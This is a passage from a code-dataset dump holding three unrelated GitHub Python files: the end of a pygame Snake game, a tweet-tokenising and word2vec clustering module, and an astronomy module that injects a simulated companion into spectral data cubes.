tiempo actual y time_steps es el tiempo que tarda en moverse la serpiente\nfood = snake.copy()\nfood.center = get_random_position() \nscreen = pg.display.set_mode([WINDOW] * 2)\nclock = pg.time.Clock()# 
frame rate\n\n# loop principal\nwhile True:\n for event in pg.event.get():\n if event.type == pg.QUIT:\n exit()\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_UP:\n snake_direction = (0, -TILE_SIZE)\n if event.key == pg.K_DOWN:\n snake_direction = (0, TILE_SIZE)\n if event.key == pg.K_LEFT:\n snake_direction = (-TILE_SIZE, 0)\n if event.key == pg.K_RIGHT:\n snake_direction = (TILE_SIZE, 0)\n screen.fill('black')\n pg.draw.rect(screen, 'red', food)\n if snake.colliderect(food):# si la serpiente choca con la comida\n length += 1\n food.center = get_random_position()\n if snake.left < 0 or snake.right > WINDOW or snake.top < 0 or snake.bottom > WINDOW:# si la serpiente choca con los bordes\n snake.center = get_random_position()\n length = 1\n snake_body_segments = [snake.copy()]\n food.center = get_random_position()\n if any(segment.center == snake.center for segment in snake_body_segments[:-1]):# si la serpiente choca con su cuerpo\n snake.center = get_random_position()\n length = 1\n snake_body_segments = [snake.copy()]\n food.center = get_random_position()\n [pg.draw.rect(screen, 'green', segment) for segment in snake_body_segments]\n time_now = pg.time.get_ticks()\n if time_now - time > time_steps:# si el tiempo actual menos el tiempo anterior es mayor al tiempo que tarda en moverse la serpiente\n time = time_now # el tiempo actual se vuelve el tiempo anterior\n snake.move_ip(snake_direction)\n snake_body_segments.append(snake.copy())# se agrega una copia de la cabeza de la serpiente a la lista de segmentos\n snake_body_segments = snake_body_segments[-length:]# se actualiza la lista de segmentos\n pg.display.flip()\n clock.tick(60)", "repo_name": "onurbsofa/Proyectos_Revividos.py", "sub_path": "Snake.py", "file_name": "Snake.py", "file_ext": "py", "file_size_in_byte": 2627, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.randrange", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.rect.Rect", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.rect", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 35, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 50, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 50, "usage_type": "attribute"}, {"api_name": 
"pygame.display.flip", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 56, "usage_type": "attribute"}]} +{"seq_id": "20049924390", "text": "import pathlib\nimport json\nfrom flask.globals import session\nimport pandas as pd\nfrom nltk.tokenize import TweetTokenizer\nfrom nltk.corpus import stopwords\nfrom gensim.models import Word2Vec\nfrom sklearn.cluster import KMeans\nfrom config import pathConfig\nimport re\nimport copy\n\ndef json2df(dirPath):\n dataLst = []\n if dirPath.exists():\n for jsonFile in dirPath.glob('*.json'):\n with open(jsonFile, 'r') as jf:\n try:\n jfData = json.load(jf)\n except:\n continue\n dataLst.extend(jfData)\n jf.close()\n\n return pd.DataFrame(dataLst)\n \n\ndef allRawGen(rawDirPath):\n allRawDf = json2df(rawDirPath)\n allRawDf.drop(list(range(1, 9)), inplace= True)\n allRawDf.to_json(pathConfig['woJapFile'], orient= 'split')\n \ndef tokenizedGen():\n allRawDf = pd.read_json(pathConfig['woJapFile'], orient= 'split')\n tweet_tokenizer = TweetTokenizer()\n \n # raw tokenized\n tokenizedLst = []\n for rowNum, rowData in allRawDf.iterrows():\n content = rowData['content']\n tokenizedLst.append(tweet_tokenizer.tokenize(content.lower())) \n toPrint = str(rowNum)\n print(\" \" * (10 - len(toPrint)) + toPrint, end='\\r')\n\n # read stop list\n with open(str(pathConfig['stopLst']), 'r') as f:\n stopLst = json.load(f)\n f.close()\n\n # read stop rule\n stopRule = json.load(open(pathConfig['stopRule'], 'r'))\n\n # filter out stop words -- length bound\n remainWords = []\n bigTemp = []\n for sentNum, sentence in enumerate(tokenizedLst):\n temp = []\n for word in sentence:\n if len(word) > stopRule['length lower bound'] and len(word) < stopRule['length upper bound']:\n temp.append(word)\n bigTemp.append(temp) \n toPrint = 'length bound' + str(sentNum)\n print(\" \" * (30 - len(toPrint)) + toPrint, end='\\r')\n\n remainWords = copy.deepcopy(bigTemp)\n bigTemp = []\n for sentNum, sentence in enumerate(remainWords):\n temp = []\n for word in sentence:\n if not word in stopLst:\n temp.append(word)\n bigTemp.append(temp)\n toPrint = 'stop list' + str(sentNum) + \" \"\n print(\" \" * (30 - len(toPrint)) + toPrint, end='\\r')\n \n remainWords = copy.deepcopy(bigTemp)\n bigTemp = []\n for sentNum, sentence in enumerate(remainWords[:]):\n temp = []\n try:\n firstReg = re.compile(stopRule['regex'][0])\n except IndexError:\n bigTemp = remainWords\n break\n else:\n for word in sentence:\n if not re.match(firstReg, word):\n temp.append(word)\n else:\n continue\n #print(word)\n for pattern in stopRule['regex'][1:]:\n regex = re.compile(pattern)\n for word in temp:\n if re.match(regex, word):\n temp.remove(word)\n #print(word)\n toPrint = 'regex ' + str(sentNum) + \" \"\n print(\" \" * (30 - len(toPrint)) + toPrint, end='\\r')\n bigTemp.append(temp)\n # output\n with open(str(pathConfig['tokenizedFile']), 'w') as opFile:\n json.dump(bigTemp, opFile)\n opFile.close()\n\ndef jsonFileReader(dirPathStr):\n dirPath = pathlib.Path(dirPathStr)\n dataLst = []\n if dirPath.exists():\n for jsonFile in dirPath.glob('*.json'):\n with open(jsonFile, 'r') as jf:\n try:\n jfData = json.load(jf)\n except:\n continue\n dataLst.extend(jfData)\n jf.close()\n\n articleCnt = 0\n try:\n articleCnt = len(dataLst)\n twitterRawDf = pd.DataFrame(dataLst).sample(n= 15).to_html(classes='data')\n except:\n twitterRawDf = pd.DataFrame()\n return articleCnt, twitterRawDf\n\ndef authorStat(filePath):\n allRaw = pd.read_json(filePath, orient= 'split')\n contentCntByAuthor = 
allRaw.groupby(by= 'author').count()[['content']]\n contentCntByAuthor.sort_values(by= 'content', ascending= False)\n print(contentCntByAuthor.columns)\n return contentCntByAuthor\n\n\ndef wordStat(filePath1, filePath2):\n stopwordLst = stopwords.words('english')\n allRaw = pd.read_json(filePath1, orient= 'split')\n tokenizedTb = pd.read_json(filePath2, orient= 'split')\n view1 = tokenizedTb.join(allRaw.reset_index()[['index', 'author']], on='index', rsuffix= '_words')\n view2 = view1[view1['pos_tag'].isin(['NN', 'NNP', 'NNS', 'NNPS'])]\n view2 = view2[~view2['word'].isin(stopwordLst)].groupby(by= ['author', 'word'])\n view3 = view2.count()[['wordCnt']].sort_values(by= ['author', 'wordCnt'], ascending= False)\n view3['rank'] = view3.groupby(by= ['author']).rank(ascending= False)\n view3.reset_index(inplace=True)\n return(view3)\n\ndef loadModel(filePath):\n return Word2Vec.load(filePath)\n\ndef wvCluster(wvModel, clusterCnt = 4):\n kMeansModel = KMeans(n_clusters= clusterCnt)\n kMeansModel.fit(wvModel.wv.vectors)\n\n similarLst= []\n for center in kMeansModel.cluster_centers_:\n similarLst.append(wvModel.most_similar([center], topn= 20))\n\n similarWordTb = pd.DataFrame(similarLst[0], columns = ['group_1', 'similarity_1'])\n for i, circle in enumerate(similarLst[1:]):\n temp = pd.DataFrame(circle, columns = [f'group_{i+2}', f'similarity_{i+2}'])\n similarWordTb = similarWordTb.merge(temp, left_index= True, right_index= True)\n\n similarWordTb.to_json(pathConfig['circleTb'], orient= 'split')\n return similarWordTb.to_html()\n\ndef grading(tokenizedLst, circleTb):\n clusterCnt = int(circleTb.shape[1] / 2)\n scoreDict = dict()\n for i in range(clusterCnt):\n currentGp = f'group_{i+1}'\n gradingDict = circleTb.iloc[:, 2 * i: 2 * (i + 1)].set_index(currentGp).to_dict()\n gradingDict = gradingDict[f'similarity_{i+1}']\n scoreDict[currentGp] = []\n for sentence in tokenizedLst:\n score = 0\n for word in sentence:\n try:\n score += gradingDict[word]\n except KeyError:\n continue\n scoreDict[currentGp].append(score / len(session))\n scoreTb = pd.DataFrame(scoreDict).reset_index()\n return scoreTb\n \n\n\ndef wordToVec_train(sentences):\n model = Word2Vec(sentences= sentences)\n\n", "repo_name": "jian5753/NTU2020Q1_twitter", "sub_path": "app/main/infunction.py", "file_name": "infunction.py", "file_ext": "py", "file_size_in_byte": 6450, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 25, "usage_type": "call"}, {"api_name": "config.pathConfig", "line_number": 31, "usage_type": "name"}, {"api_name": "pandas.read_json", "line_number": 34, "usage_type": "call"}, {"api_name": "config.pathConfig", "line_number": 34, "usage_type": "name"}, {"api_name": "nltk.tokenize.TweetTokenizer", "line_number": 35, "usage_type": "call"}, {"api_name": "config.pathConfig", "line_number": 46, "usage_type": "name"}, {"api_name": "json.load", "line_number": 47, "usage_type": "call"}, {"api_name": "json.load", "line_number": 51, "usage_type": "call"}, {"api_name": "config.pathConfig", "line_number": 51, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 65, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 76, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 81, "usage_type": "call"}, {"api_name": "re.match", "line_number": 87, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 
93, "usage_type": "call"}, {"api_name": "re.match", "line_number": 95, "usage_type": "call"}, {"api_name": "config.pathConfig", "line_number": 102, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 103, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 107, "usage_type": "call"}, {"api_name": "json.load", "line_number": 113, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 122, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 128, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 136, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 136, "usage_type": "name"}, {"api_name": "pandas.read_json", "line_number": 137, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 138, "usage_type": "call"}, {"api_name": "gensim.models.Word2Vec.load", "line_number": 148, "usage_type": "call"}, {"api_name": "gensim.models.Word2Vec", "line_number": 148, "usage_type": "name"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 151, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 158, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 160, "usage_type": "call"}, {"api_name": "config.pathConfig", "line_number": 163, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 181, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 182, "usage_type": "call"}, {"api_name": "gensim.models.Word2Vec", "line_number": 188, "usage_type": "call"}]} +{"seq_id": "20885029467", "text": "#!/usr/bin/env python3\nimport numpy as np\n\nfrom astropy.table import Table\nfrom astropy import units as u\nfrom .my_warnings import warnings\n\n\nclass InjectCompanion:\n '''\n This class is meant to be inherited by a KlipRetrieve() or PreInjectImages()\n class instance, not used individually.\n\n Contains self.inject_companion(), the key method for injecting a companion\n into a set of data cubes, and its associated support methods.\n\n If called from a PreInjectImages() instance on a directory of\n original \"observations\" from CreateImages(), the injection will occur\n without any subsequent alignment or subtraction of images.\n\n If called from a KlipRetrieve() instance, the injection will take place\n *after* alignment and subtraction.\n '''\n\n def _check_spectrum(self, arg, format):\n '''\n Called from `self.inject_companion()`. Validates a spectrum passed to\n that method based on its docstring. 
If it passes, gets the Table ready\n for flux binning in `self._get_bin_fluxes()`.\n\n Argument `arg` is either an astropy Table or a string file path to one.\n\n Argument `format` is a string representing the file format used to help\n astropy's Table.read() method read in the Table if `arg` is a string.\n '''\n if isinstance(arg, str):\n spectrum = Table.read(spectrum, format=format)\n else:\n spectrum = arg.copy()\n\n # rename columns\n spectrum.rename_column(spectrum.colnames[0], 'wvln')\n spectrum.rename_column(spectrum.colnames[1], 'flux')\n\n # check for units\n if spectrum['wvln'].unit is None or spectrum['flux'].unit is None:\n raise ValueError('Both columns must have units.')\n\n # convert/add wavelength and flux units\n spectrum['wvln'] = spectrum['wvln'].to(u.micron)\n spectrum['flux'] = spectrum['flux'].to(u.mJy, u.spectral_density(spectrum['wvln'].quantity))\n\n # sort by increasing wavelength (just to be sure)\n sort_by_wv = np.argsort(spectrum['wvln'])\n spectrum = spectrum[sort_by_wv]\n\n wvln_column = spectrum['wvln'].quantity\n flux_column = spectrum['flux'].quantity\n\n # cut table to nirspec wavelengths with breathing room on both edges\n # of half a slice's (wavelength step's) size\n step_size = self.wvlnths[1] - self.wvlnths[0]\n lo_ind = np.searchsorted(wvln_column,\n (self.lo_wv - step_size/2) * u.m, side='left')\n hi_ind = np.searchsorted(wvln_column,\n (self.hi_wv + step_size/2) * u.m, side='right')\n\n spectrum = spectrum[lo_ind:hi_ind]\n\n return spectrum\n\n def _get_bin_fluxes(self, spectrum):\n '''\n Called from `self.inject_companion()`. Divides a spectrum into bins\n based on wavelengths in `self.wvlnths`, calculates the mean flux in\n each bin, then returns the resulting array of binned flxues.\n\n Argument `spectrum` is an astropy Table that follows the requirements\n spelled out in the docstring of `self.inject_companion()`.\n '''\n wvln_column = spectrum['wvln'].quantity\n flux_column = spectrum['flux'].quantity\n\n # get step width between slices (wavelengths) -- should be constant\n step_size = self.wvlnths[1] - self.wvlnths[0]\n\n # create array with (wavelength) bin edges. bin and step width are equal\n # (wvlnth[x]'s edges are bin_edges[x:x+1+1])\n bin_edges = np.linspace(self.lo_wv - step_size / 2,\n self.hi_wv + step_size / 2,\n len(self.wvlnths) + 1, endpoint=True)\n\n # find where in (sorted) column of wavelength each edge falls\n bin_inds = np.searchsorted(wvln_column, bin_edges * u.m, side='right')\n # (same behavior as bisect_right)\n\n # fill an array of mean fluxes in each bin\n bin_fluxes = np.zeros(len(self.wvlnths)) * u.mJy\n for i in range(len(bin_inds) - 1):\n # record mean of fluxes whose wavelengths fall in this bin\n if bin_inds[i + 1] - bin_inds[i] > 0:\n bin_fluxes[i] = flux_column[bin_inds[i]\n : bin_inds[i + 1]].mean()\n # if there are no fluxes in this bin, record mean of fluxes\n # at the previous flux_column index and the current one\n else:\n bin_fluxes[i] = flux_column[bin_inds[i] - 1\n : bin_inds[i] + 1].mean()\n\n return bin_fluxes\n\n def _choose_random_sep(self, target_images):\n '''\n Called from `self._inject_companion()` if the user didn't specify a\n companion separation.\n\n Calculates separations that will safely remain in-frame for all\n pointings, then randomly chooses Y and X pixel distances from the set\n that remains. 
Returns those pixel distances along with the resulting\n distance magnitude in arcseconds.\n\n Argument `target_images` is a 4D array of data cubes from each target\n observation.\n '''\n pix_len = .1\n\n # limit to pixels that aren't within N pixels of star or the edge\n edge_gap = 2; st_gap = 1 #pixels\n min_sep = np.round(np.sqrt(2 * ((st_gap + 1) * pix_len)**2), 1)\n\n # find indices of brightest pixel in each cube's 0th slice\n # (all slices of a given image cube should have the same bright spot)\n star_locs = np.array([np.unravel_index(np.argmax(target_images[i, 0]),\n target_images[i, 0].shape)[::-1]\n for i in range(target_images.shape[0])])\n\n # in each image, get indices of possible pixels in each direction,\n # excluding ones too close to the edge\n poss_y = np.arange(target_images.shape[-2])[edge_gap:-edge_gap]\n poss_x = np.arange(target_images.shape[-1])[edge_gap:-edge_gap]\n\n # in each image, get the maximum safe pixel distance in each direction\n # (i.e. how many pixels from the star is the nearest edge in x and y?)\n max_ys = [np.abs(st_y - poss_y[-1])\n if np.abs(st_y - poss_y[-1]) < np.abs(st_y - poss_y[0])\n else np.abs(st_y - poss_y[0])\n for st_y in star_locs[:,0]]\n\n max_xs = [np.abs(st_x - poss_x[-1])\n if np.abs(st_x - poss_x[-1]) < np.abs(st_x - poss_x[0])\n else np.abs(st_x - poss_x[0])\n for st_x in star_locs[:,0]]\n\n # next, exclude pixels too close to the star\n max_safe_y = int(np.min(max_ys)); max_safe_x = int(np.min(max_xs))\n #print('max_safes', max_safe_y, max_safe_x)\n max_safe_sep = np.round(np.hypot(max_safe_x, max_safe_y))\n\n below_max_y = np.arange(-max_safe_y, max_safe_y + 1).astype(int)\n below_max_x = np.arange(-max_safe_x, max_safe_x + 1).astype(int)\n\n poss_dists_y = np.delete(below_max_y,\n np.s_[max_safe_y - st_gap\n : max_safe_y + st_gap + 1])\n poss_dists_x = np.delete(below_max_x,\n np.s_[max_safe_x - st_gap\n : max_safe_x + st_gap + 1])\n #print(poss_dists_x)\n #print(poss_dists_y)\n\n # choose companion x/y distances based on remaining, safe pixels\n dist_y = np.random.choice(poss_dists_y)\n dist_x = np.random.choice(poss_dists_x)\n dist_arc = np.hypot(dist_x * pix_len, dist_y * pix_len)\n #print(max_safe_sep, dist_y, dist_x)\n\n return dist_y, dist_x, dist_arc\n\n def inject_companion(self, cube_list, comp_scale=None, return_fluxes=False,\n star_spectrum=None, comp_spectrum=None,\n star_format=None, comp_format=None,\n separation=None, position_angle=0, verbose=True):\n '''\n There are two options for scaling.\n\n First, argument `comp_scale` is a float that makes the companion's flux\n X times the standard deviation of pixel intensity at the specified\n radial separation from the star in the pre-subtraction image. (Radial\n profile information comes from `self.pre_prof_hdu`.)\n\n Second, arguments `comp_spectrum` and `star_spectrum` should either be\n astropy Table objects *or* string paths to spectra files that can be\n read in as Tables. If you go the string route, you must also provide the\n proper format as argument `comp_format` or `star_format`. (See\n astropy's Table.read() documentation for more on acceptable formats.)\n\n Whichever route you take, the tables/files **must**:\n - have two columns of data. 
The first column should contain\n wavelengths; the second should contain fluxes.\n - have wavelength units of microns or something equivalent.\n - have flux density units of erg / s / cm**2 / Hz, erg / s / cm**3,\n mJy, or something equivalent.\n\n Argument `return_fluxes` is a boolean that, if True, makes this method\n return, in order, the HDUList of injected data cubes, the star's binned\n spectrum, and the companion's binned spectrum.\n\n Argument `separation` is a float that represents the separation of the\n companion from the star in arcseconds. (Note that the value is rounded\n to the nearest tenth of an arcsecond.) If it is `None`, the method will\n randomly choose a companion location that falls safely in-scene for all\n observations' data cubes.\n\n Argument `position_angle` is a float that represents the companion's\n position angle in degrees, relative to the star. The default is 0\n (north). It only has an effect if you've specified a separation.\n\n Argument `verbose` is a boolean that, when True, allows the method to\n print progress messages.\n\n The method will always return the new HDUList of injected data cubes.\n '''\n # gives PSF + PSF_shifted * F_planet/F_star, so star's PSF always ~= 1.\n\n print_ast = lambda text: print('********', text, '********', sep='\\n')\n my_pr = lambda txt: print_ast(txt) if verbose else None\n\n # find which child of this class is calling the method\n _is_klip_retrieve = 'KlipRetrieve' in repr(self)\n\n # I. Check on how the companion will be scaled\n if star_spectrum is not None and comp_spectrum is not None:\n if comp_scale is None:\n # validate both spectra. if str, open file. else, assumes Table\n star_spec = self._check_spectrum(star_spectrum, star_format)\n comp_spec = self._check_spectrum(comp_spectrum, comp_format)\n got_spectra = True\n else:\n raise ValueError('You must either provide `comp_scale` OR a '\n '`star_spectrum` and a `comp_spectrum`. All '\n 'three were provided.')\n elif comp_scale is not None:\n if _is_klip_retrieve:\n # continue on with comp_scale\n got_spectra = False\n else:\n raise ValueError('When calling from a `PreInjectImages()` '\n 'instance, you must include spectra; scaling '\n \"by scene's standard deviation is \"\n 'unavailable.')\n else:\n raise ValueError('You must either provide `comp_scale` OR a '\n '`star_spectrum` and a `comp_spectrum`.')\n\n # collect all cube data in one array\n cube_list = self._pklcopy(cube_list)[len(self.positions):]\n tgt_imgs = np.array([cube.data for cube in cube_list])\n\n msg1 = ('spectrally defined ' if got_spectra\n else f\"(location-specific) {comp_scale:.0f}-sigma \")\n msg2 = (', after alignment' if _is_klip_retrieve\n else ' into unaligned images')\n my_pr('injecting companion with ' + msg1 + 'intensity' + msg2 + '.')\n\n # II. 
Translate the companion images\n pix_len = .1\n if separation is None:\n # randomly generate the companion's x/y separation\n s_y, s_x, separation = self._choose_random_sep(tgt_imgs)\n pix_sep = np.round(separation / pix_len)\n else:\n theta = np.deg2rad(position_angle)\n pix_sep = np.round(separation / pix_len)\n\n # trigonometrically convert separation magnitude to x/y separations,\n # using astronomical convention where PA = 0 is north/up\n s_y = np.round(pix_sep * np.cos(theta)).astype(int)\n s_x = np.round(pix_sep * -np.sin(theta)).astype(int)\n\n # shift a copy of the star's PSF to the specified companion position\n # (pad doesn't accept negatives, so we must add zeros/slice creatively)\n cmp_imgs = np.pad(tgt_imgs, mode='constant', pad_width=\n ((0,0), (0,0),\n (s_y if s_y > 0 else 0, -s_y if s_y < 0 else 0),\n (s_x if s_x > 0 else 0, -s_x if s_x < 0 else 0))\n )[:, :,\n -s_y if s_y < 0 else 0: -s_y if s_y > 0 else None,\n -s_x if s_x < 0 else 0: -s_x if s_x > 0 else None]\n\n # warn that the companion might be off-frame if most flux is gone\n if (cmp_imgs.sum(axis=(2,3)) < .2).sum() != 0:\n warnings.warn('The companion may be off-frame in some slices. '\n 'Try reducing `separation` if this is undesirable.')\n\n # III. Scale the companion images\n if got_spectra:\n # get binned fluxes based on spectra and take their ratio\n star_fluxes = self._get_bin_fluxes(star_spec)\n comp_fluxes = self._get_bin_fluxes(comp_spec)\n slices_scaled_1x = (comp_fluxes / star_fluxes).value\n\n # extend the contrast array to repeat once per data cube\n slices_scaled = np.tile(slices_scaled_1x, (tgt_imgs.shape[0], 1))\n # (tgt_imgs.shape[0] x tgt_imgs.shape[1]), or (n_cubes x n_slices)\n else:\n # get pre-subtraction separation & flux std. dev data from all cubes\n pre_prof_data = np.array([cb.data for cb in self.pre_prof_hdu])\n arc_seps = pre_prof_data[:,:,0]\n flux_stds = pre_prof_data[:,:,1]\n\n # in all slices, get flux std. dev at given arcsecond separation\n rad_dist_inds = np.argmin(np.abs(arc_seps - separation), axis=2)\n slice_stds = flux_stds[np.arange(arc_seps.shape[0])[:,np.newaxis],\n np.arange(arc_seps.shape[1]),\n rad_dist_inds]\n\n # scale to turn those into `comp_scale`-sigma fluxes\n slices_scaled = slice_stds * comp_scale\n\n # NB: in the future, might need to scale BOTH the star and the companion\n # (that way you can see absorption features in the star and you don't\n # mistake wavelengths where the star gets fainter as emission features\n # for the companion).\n # this would lead to different total fluxes depending on slice of data\n # cube, which would mess with the current scaling in plot_subtraction().\n # would also probably be a good idea to multiply stackable cubes by the\n # stellar spectrum once that's implemented so the same behavior is\n # present in both the companion=False/True cases of plot_subtraction()\n\n # IV. 
Save companion's pixel position angle using law of cosines:\n # c^2 = a^2 + b^2 - 2*a*b*cos(theta) -> c^2 = 2*a^2 * (1 - cos(theta))\n # (where a = b = pix_sep and c is companion to north point pixel dist.)\n comp_to_north = np.hypot(pix_sep - s_y, 0 - s_x)\n\n # to get theta, the actual position angle, we need an inverse cosine.\n # ensure the coord given as its argument is in arccos' domain (-1 to 1)\n coord = ( -comp_to_north**2 / (2 * pix_sep**2) ) + 1\n coord = -1 if -1 > coord else 1 if 1 < coord else coord\n actual_PA = np.rad2deg(np.arccos(coord))\n\n # then, since arccos' range is only 0-180 degrees, account for 180-360.\n # it gives correct angle/wrong sign in that case (neg. s_x), so flip it\n if s_x > 0:\n actual_PA *= -1\n\n # V. Build a new HDUList with the injected images\n # in each cube, multiply each wavelength slice by its respective scaling\n # (add new axes to slices_scaled so dims work for array broadcasting)\n cmp_imgs *= slices_scaled[:, :, np.newaxis, np.newaxis]\n #cmp_imgs *= slices_scaled.reshape(slices_scaled.shape + (1,1))]\n\n # simulate the injection by summing the original and companion cubes\n inj_imgs = tgt_imgs + cmp_imgs\n\n # create the HDUList that will the hold new, injected target images\n try:\n inj_cubes = self._pklcopy(self.stackable_cubes[len(tgt_imgs):])\n except AttributeError:\n inj_cubes = self._pklcopy(self.data_cubes[len(tgt_imgs):])\n\n # Copy these injected images and associated info into the new data cube\n for i, cube in enumerate(inj_cubes):\n cube.data = inj_imgs[i]\n\n cube.header['PIXCOMPY'] = (s_y, \"this + PIXSTARY is companion's Y \"\n 'pixel location')\n cube.header['PIXCOMPX'] = (s_x, \"this + PIXSTARX is companion's X \"\n 'pixel location')\n cube.header['POSANGLE'] = (actual_PA, \"angle between companion and \"\n 'north pixels, deg.')\n\n if got_spectra:\n for n, ratio in enumerate(slices_scaled_1x):\n keyw = 'CONT' + f\"{n:04d}\"\n cube.header[keyw] = (ratio, f\"slice {n:}'s companion to \"\n 'star flux ratio')\n else:\n cube.header['XSIGMA'] = (comp_scale, 'comp. 
flux / stddev of '\n 'scene flux at separation')\n\n # if an injection has already occurred, replace it with this new one\n if hasattr(self, 'injected_cubes'):\n self.injected_cubes = inj_cubes\n my_pr('new, injected target images in `self.injected_cubes`.')\n\n # return new cubes (and fluxes, if requested)\n if return_fluxes:\n try:\n return inj_cubes, star_fluxes, comp_fluxes\n except NameError:\n warnings.warn('No spectra were provided; no fluxes to return.')\n\n else:\n return inj_cubes\n", "repo_name": "ojustino/subtract_psf", "sub_path": "subtract_psf/inject_images.py", "file_name": "inject_images.py", "file_ext": "py", "file_size_in_byte": 18836, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "astropy.table.Table.read", "line_number": 37, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 37, "usage_type": "name"}, {"api_name": "astropy.units.micron", "line_number": 50, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 50, "usage_type": "name"}, {"api_name": "astropy.units.mJy", "line_number": 51, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 51, "usage_type": "name"}, {"api_name": "astropy.units.spectral_density", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.searchsorted", "line_number": 63, "usage_type": "call"}, {"api_name": "astropy.units.m", "line_number": 64, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 64, "usage_type": "name"}, {"api_name": "numpy.searchsorted", "line_number": 65, "usage_type": "call"}, {"api_name": "astropy.units.m", "line_number": 66, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 66, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.searchsorted", "line_number": 94, "usage_type": "call"}, {"api_name": "astropy.units.m", "line_number": 94, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 94, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 98, "usage_type": "call"}, {"api_name": "astropy.units.mJy", "line_number": 98, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 98, "usage_type": "name"}, {"api_name": "numpy.round", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.hypot", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.arange", 
"line_number": 159, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.s_", "line_number": 163, "usage_type": "attribute"}, {"api_name": "numpy.delete", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.s_", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 172, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 173, "usage_type": "attribute"}, {"api_name": "numpy.hypot", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 277, "usage_type": "call"}, 